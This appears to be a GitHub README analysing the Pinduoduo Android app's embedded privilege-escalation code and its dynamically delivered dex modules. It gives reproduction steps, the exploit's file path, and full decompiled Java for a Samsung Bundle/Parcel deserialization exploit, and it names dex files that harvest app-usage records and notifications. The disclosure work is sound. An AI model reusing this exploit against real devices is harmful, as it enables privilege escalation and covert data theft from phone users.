拼多多apk内嵌提权代码，及动态下发dex分析

参考「深蓝洞察」的文章：https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWsw （Bundle 风水 - Android Parcel 序列化与反序列化不匹配系列漏洞，实现 0day/Nday 攻击，从而绕过系统校验，获取系统级 StartAnyWhere 能力）

复现流程如下：
下载3月5日前更新的（6.50版本前）的拼多多apk，如6.49版本：
https://com-xunmeng-pinduoduo.en.uptodown.com/android/download/91472728

解压apk文件，找到拼多多apk中，提权代码所在的文件位置：
pinduoduo-6-49-0.zip\assets\component\com.xunmeng.pinduoduo.AliveBaseAbility.7z\com.xunmeng.pinduoduo.AliveBaseAbility\vmp_src\mw1.bin

以上是一个加VMP壳的dex文件，脱壳还原出代码，可以找到针对不同手机厂商系统的多个用于提权的漏洞利用代码，胆子相当的大，比如利用三星手机“com.samsung.android.cepproxyks.CertByte”的提权漏洞，代码如下：

// assets/component/com.xunmeng.pinduoduo.AliveBaseAbilitiy
// [Manwei]
// com/xunmeng/pinduoduo/android_pull_ablity_comp/pullstartup/SamsungAlivePullStartup 

Public static Bundle makeBundleForSamsungSinceP(Intent intent){
   Bundle bundle = new Bundle();
   Parcel obtain = Parcel.obtain();
   Parcel obtain2 = Parcel.obtain();
   Parcel obtain3 = Parcel.obtain();
   obtain2.writeInt(3);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(3);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(4);
   obtain2.writeString("com.samsung.android.cepproxyks.CertByte");
   obtain2.writeInt(0);
   byte b[] = new byte[0];
   obtain2.writeByteArray(b);
   obtain2.writeInt(0);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(53);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(1);
   obtain2.writeInt(1);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(48);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(13);
   obtain2.writeInt(-1);
   int dataPosition = obtain2.dataPosition();
   obtain2.writeString("intent");
   obtain2.writeInt(4);
   obtain2.writeString("android.content.Intent");
   obtain2.writeToParcel(obtain3, 0);
   obtain2.appendFrom(obtain3, 0, obtain3.dataSize());
   int dataPosition2 = obtain2.dataPosition();
   obtain2.setDataPosition(dataPosition2 - 4);
   obtain2.writeInit(dataPosition2 -dataPosition);
   obtain2.setdataPosition(dataPosition2);
   int dataSize = obtain2.dataSize();
   obtain.writeInt(dataSize);
   obtain.writeInt(1279544898);
   obtain.appendFrom(obtain2, 0, dataSize);
   obtain.setDataPosition(0);
   bundle.readFromParcel(obtain);
   return bundle;
}

提权后，就开始瞎搞了，动态下发dex，开始给自己保活，防卸载，然后搞数据，这部分代码比较通俗易懂，比如：
1a68d982e02fc22b464693a06f528fac.dex 读取用户手机上的app使用记录
95cd95ab4d694ad8bdf49f07e3599fb3.dex 读取用户手机的应用通知，这一波各大公司app全灭了吧？

自己去dex目录看吧。

Name	Name	Last commit message	Last commit date
Latest commit History 6 Commits
dex	dex
README.md	README.md
「深蓝洞察」2022 年度最“不可赦”漏洞.pdf	「深蓝洞察」2022 年度最“不可赦”漏洞.pdf

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

拼多多apk内嵌提权代码，及动态下发dex分析

About

Uh oh!

Releases

Packages

Search code, repositories, users, issues, pull requests...

CoderExamples/pinduoduo_backdoor

Folders and files

Latest commit

History

Repository files navigation

拼多多apk内嵌提权代码，及动态下发dex分析

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Packages